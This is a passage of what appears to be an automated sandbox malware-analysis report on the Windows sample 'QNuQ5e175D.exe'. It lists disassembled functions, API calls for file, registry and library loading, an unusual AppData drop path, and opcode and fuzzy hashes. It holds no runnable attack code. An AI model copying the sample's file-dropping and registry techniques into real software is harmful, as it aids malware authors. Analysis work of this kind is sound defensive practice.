                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsj924C.tmp$C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll$C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres$Call
                                                        • API String ID: 1941528284-3366649160
                                                        • Opcode ID: 92f8b93885e00e2238c8143a7be30e505a2fe7597e0250fcbd3cd8e0f990a4c4
                                                        • Instruction ID: 896c0c78208a39cbb5dd39340d0745d1a2bf2ace5f7797069eceb710e9101d93
                                                        • Opcode Fuzzy Hash: 92f8b93885e00e2238c8143a7be30e505a2fe7597e0250fcbd3cd8e0f990a4c4
                                                        • Instruction Fuzzy Hash: 4C41B671900108BACB117BB5DD85DBE7AB9EF45328F21423FF412B10E2D73C8A919A2D
                                                        Function 004055FC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 923 4055fc-405611 924 405617-405628 923->924 925 4056c8-4056cc 923->925 926 405633-40563f lstrlenW 924->926 927 40562a-40562e call 4065b4 924->927 929 405641-405651 lstrlenW 926->929 930 40565c-405660 926->930 927->926 929->925 931 405653-405657 lstrcatW 929->931 932 405662-405669 SetWindowTextW 930->932 933 40566f-405673 930->933 931->930 932->933 934 405675-4056b7 SendMessageW * 3 933->934 935 4056b9-4056bb 933->935 934->935 935->925 936 4056bd-4056c0 935->936 936->925
                                                        APIs
                                                        • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                        • lstrlenW.KERNEL32(0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                        • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,0040343D,0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0), ref: 00405657
                                                        • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll), ref: 00405669
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                        • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll
                                                        • API String ID: 2531174081-1930431089
                                                        • Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                        • Instruction ID: 60923f6e922cea494a698f26c75bee70e53a21f42b4b77269416c2a585f1ce57
                                                        • Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                        • Instruction Fuzzy Hash: 9A21A171900258BACB119FA5ED449DFBFB4EF45310F50843AF908B22A0C3794A40CFA8
                                                        Function 00402711 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 937 402711-40272a call 402da9 940 402730-402737 937->940 941 402c4f-402c52 937->941 942 402739 940->942 943 40273c-40273f 940->943 944 402c58-402c5e 941->944 942->943 945 4028a3-4028ab 943->945 946 402745-402754 call 4064d7 943->946 945->941 946->945 950 40275a 946->950 951 402760-402764 950->951 952 4027f9-4027fc 951->952 953 40276a-402785 ReadFile 951->953 955 402814-402824 call 4060ea 952->955 956 4027fe-402801 952->956 953->945 954 40278b-402790 953->954 954->945 957 402796-4027a4 954->957 955->945 964 402826 955->964 956->955 958 402803-40280e call 406148 956->958 960 4027aa-4027bc MultiByteToWideChar 957->960 961 40285f-40286b call 4064be 957->961 958->945 958->955 960->964 965 4027be-4027c1 960->965 961->944 968 402829-40282c 964->968 969 4027c3-4027ce 965->969 968->961 971 40282e-402833 968->971 969->968 972 4027d0-4027f5 SetFilePointer MultiByteToWideChar 969->972 973 402870-402874 971->973 974 402835-40283a 971->974 972->969 975 4027f7 972->975 977 402891-40289d SetFilePointer 973->977 978 402876-40287a 973->978 974->973 976 40283c-40284f 974->976 975->964 976->945 979 402851-402857 976->979 977->945 980 402882-40288f 978->980 981 40287c-402880 978->981 979->951 982 40285d 979->982 980->945 981->977 981->980 982->945
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,?,?,?), ref: 0040277D
                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                        • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                          • Part of subcall function 00406148: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040615E
                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                        • String ID: 9
                                                        • API String ID: 163830602-2366072709
                                                        • Opcode ID: e6852b5c5fbfd8bc876860f3b14f1bcaed0b753dd9a04d4db6e12186382bd870
                                                        • Instruction ID: d1aefac9689752b6b3ea6a4f87dd4281ecbe68d6f3974aa7f4e2ef829afcd0bd
                                                        • Opcode Fuzzy Hash: e6852b5c5fbfd8bc876860f3b14f1bcaed0b753dd9a04d4db6e12186382bd870
                                                        • Instruction Fuzzy Hash: 66510C75D04119AADF20EFD4CA85AAEBBB9FF44304F14817BE501B62D0D7B89D828B58
                                                        Function 004068FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 983 4068fb-40691b GetSystemDirectoryW 984 40691d 983->984 985 40691f-406921 983->985 984->985 986 406932-406934 985->986 987 406923-40692c 985->987 989 406935-406968 wsprintfW LoadLibraryExW 986->989 987->986 988 40692e-406930 987->988 988->989
                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406912
                                                        • wsprintfW.USER32 ref: 0040694D
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406961
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                        • String ID: %s%S.dll$UXTHEME
                                                        • API String ID: 2200240437-1106614640
                                                        • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                        • Instruction ID: 6d7bab0cfc2d48cbbbe6bb2f91b005b1c0391479526b60628745523d5c0137a7
                                                        • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                        • Instruction Fuzzy Hash: 66F02B71501129A7CF10AB68DD0EF9F376CAB00304F10447AA646F10E0EB7CDB69CB98
                                                        Function 00402ECE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 990 402ece-402ef7 call 4063e4 992 402efc-402f00 990->992 993 402fb1-402fb5 992->993 994 402f06-402f0a 992->994 995 402f0c-402f2d RegEnumValueW 994->995 996 402f2f-402f42 994->996 995->996 997 402f96-402fa4 RegCloseKey 995->997 998 402f6b-402f72 RegEnumKeyW 996->998 997->993 999 402f44-402f46 998->999 1000 402f74-402f86 RegCloseKey call 40696b 998->1000 999->997 1001 402f48-402f5c call 402ece 999->1001 1005 402fa6-402fac 1000->1005 1006 402f88-402f94 RegDeleteKeyW 1000->1006 1001->1000 1008 402f5e-402f6a 1001->1008 1005->993 1006->993 1008->998
                                                        APIs
                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CloseEnum$DeleteValue
                                                        • String ID:
                                                        • API String ID: 1354259210-0
                                                        • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                        • Instruction ID: 446d876c474c9d83549856ad9cac23e68bb7371358ae7480bd0e7fa7c4692e5e
                                                        • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                        • Instruction Fuzzy Hash: 1D212A7150010ABFDF129F90CE89EEF7A7DEB54388F110076B909B21E0E7B58E54AA64
                                                        Function 73B01817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1009 73b01817-73b01856 call 73b01bff 1013 73b01976-73b01978 1009->1013 1014 73b0185c-73b01860 1009->1014 1015 73b01862-73b01868 call 73b0243e 1014->1015 1016 73b01869-73b01876 call 73b02480 1014->1016 1015->1016 1021 73b018a6-73b018ad 1016->1021 1022 73b01878-73b0187d 1016->1022 1023 73b018cd-73b018d1 1021->1023 1024 73b018af-73b018cb call 73b02655 call 73b01654 call 73b01312 GlobalFree 1021->1024 1025 73b01898-73b0189b 1022->1025 1026 73b0187f-73b01880 1022->1026 1030 73b018d3-73b0191c call 73b01666 call 73b02655 1023->1030 1031 73b0191e-73b01924 call 73b02655 1023->1031 1047 73b01925-73b01929 1024->1047 1025->1021 1032 73b0189d-73b0189e call 73b02e23 1025->1032 1028 73b01882-73b01883 1026->1028 1029 73b01888-73b01889 call 73b02b98 1026->1029 1035 73b01890-73b01896 call 73b02810 1028->1035 1036 73b01885-73b01886 1028->1036 1042 73b0188e 1029->1042 1030->1047 1031->1047 1045 73b018a3 1032->1045 1046 73b018a5 1035->1046 1036->1021 1036->1029 1042->1045 1045->1046 1046->1021 1051 73b01966-73b0196d 1047->1051 1052 73b0192b-73b01939 call 73b02618 1047->1052 1051->1013 1057 73b0196f-73b01970 GlobalFree 1051->1057 1059 73b01951-73b01958 1052->1059 1060 73b0193b-73b0193e 1052->1060 1057->1013 1059->1051 1062 73b0195a-73b01965 call 73b015dd 1059->1062 1060->1059 1061 73b01940-73b01948 1060->1061 1061->1059 1063 73b0194a-73b0194b FreeLibrary 1061->1063 1062->1051 1063->1059
                                                        APIs
                                                          • Part of subcall function 73B01BFF: GlobalFree.KERNEL32(?), ref: 73B01E74
                                                          • Part of subcall function 73B01BFF: GlobalFree.KERNEL32(?), ref: 73B01E79
                                                          • Part of subcall function 73B01BFF: GlobalFree.KERNEL32(?), ref: 73B01E7E
                                                        • GlobalFree.KERNEL32(00000000), ref: 73B018C5
                                                        • FreeLibrary.KERNEL32(?), ref: 73B0194B
                                                        • GlobalFree.KERNEL32(00000000), ref: 73B01970
                                                          • Part of subcall function 73B0243E: GlobalAlloc.KERNEL32(00000040,?), ref: 73B0246F
                                                          • Part of subcall function 73B02810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73B01896,00000000), ref: 73B028E0
                                                          • Part of subcall function 73B01666: wsprintfW.USER32 ref: 73B01694
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1569059369.0000000073B01000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B00000, based on PE: true
                                                        • Associated: 00000000.00000002.1568940355.0000000073B00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1569611314.0000000073B04000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1569637966.0000000073B06000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73b00000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc$Librarywsprintf
                                                        • String ID:
                                                        • API String ID: 3962662361-3916222277
                                                        • Opcode ID: 8ddf8b96a83183c565039990dd5ee60695c63d7fc0d3364ec6c3c365f05090d9
                                                        • Instruction ID: 8234ea1bd2cbb2422e39065a30bf6b7be6ef12052fa984aa9357820ab416ca34
                                                        • Opcode Fuzzy Hash: 8ddf8b96a83183c565039990dd5ee60695c63d7fc0d3364ec6c3c365f05090d9
                                                        • Instruction Fuzzy Hash: CB41B6B94003059BEB199F60D9C8B993FACEF45314F184575E94B9E4C6FB78C189C760
                                                        Function 004024AF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1066 4024af-4024e0 call 402dcb * 2 call 402e5b 1073 4024e6-4024f0 1066->1073 1074 402c4f-402c5e 1066->1074 1076 4024f2-4024ff call 402dcb lstrlenW 1073->1076 1077 402503-402506 1073->1077 1076->1077 1079 402508-402519 call 402da9 1077->1079 1080 40251a-40251d 1077->1080 1079->1080 1084 40252e-402542 RegSetValueExW 1080->1084 1085 40251f-402529 call 4032d9 1080->1085 1088 402544 1084->1088 1089 402547-402628 RegCloseKey 1084->1089 1085->1084 1088->1089 1089->1074
                                                        APIs
                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00000023,00000011,00000002), ref: 004024FA
                                                        • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00000000,00000011,00000002), ref: 0040253A
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00000000,00000011,00000002), ref: 00402622
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CloseValuelstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsj924C.tmp
                                                        • API String ID: 2655323295-1453126546
                                                        • Opcode ID: 2d5a3a6cbba744cb4f49549abd2315f3a0bbe869b0ca912842418fb0edf1760d
                                                        • Instruction ID: 9ef1a868ac7dccf2a0d827ba333ec8444b87bd6dca13d8647f6a5f0896484b93
                                                        • Opcode Fuzzy Hash: 2d5a3a6cbba744cb4f49549abd2315f3a0bbe869b0ca912842418fb0edf1760d
                                                        • Instruction Fuzzy Hash: DF11B131D00119BEEF00AFA1DE4AAAEB6B4EF44318F20443FF404B61D1D7B88E009A68
                                                        Function 00406096 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 004060B4
                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403550,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C), ref: 004060CF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CountFileNameTempTick
                                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                        • API String ID: 1716503409-2042855515
                                                        • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                        • Instruction ID: 0f0e971a11aa9000600537ad3b21051f2e76e4828209a3ca974843c19b3e0847
                                                        • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                        • Instruction Fuzzy Hash: B5F09076B40204BBEB00CF69ED05F9EB7ACEBA5750F11803AE901F7180E6B099648768
                                                        Function 004015E6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00405EF1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,?,00405F65,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp, 4ou,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,756F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405EFF
                                                          • Part of subcall function 00405EF1: CharNextW.USER32(00000000), ref: 00405F04
                                                          • Part of subcall function 00405EF1: CharNextW.USER32(00000000), ref: 00405F1C
                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                          • Part of subcall function 00405ACB: CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405B0D
                                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres,?,00000000,000000F0), ref: 00401672
                                                        Strings
                                                        • C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres, xrefs: 00401665
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                        • String ID: C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres
                                                        • API String ID: 1892508949-3533886424
                                                        • Opcode ID: 522b783c9de46c7eb01671ee67dcdc22f4b8e2acc15c0cd2b2b5e6563b12514b
                                                        • Instruction ID: 104414052cab316a424bfe0d2ff1de268c148956b102069c6a2fab9df067ebf3
                                                        • Opcode Fuzzy Hash: 522b783c9de46c7eb01671ee67dcdc22f4b8e2acc15c0cd2b2b5e6563b12514b
                                                        • Instruction Fuzzy Hash: 0911BE31804514ABCF206FA5CD01AAE36B0EF14368B25493BE941B22F1C63A4A41DA5D
                                                        Function 00406445 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,Call,?,00000000,004066B6,80000002), ref: 0040648B
                                                        • RegCloseKey.KERNELBASE(?), ref: 00406496
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue
                                                        • String ID: Call
                                                        • API String ID: 3356406503-1824292864
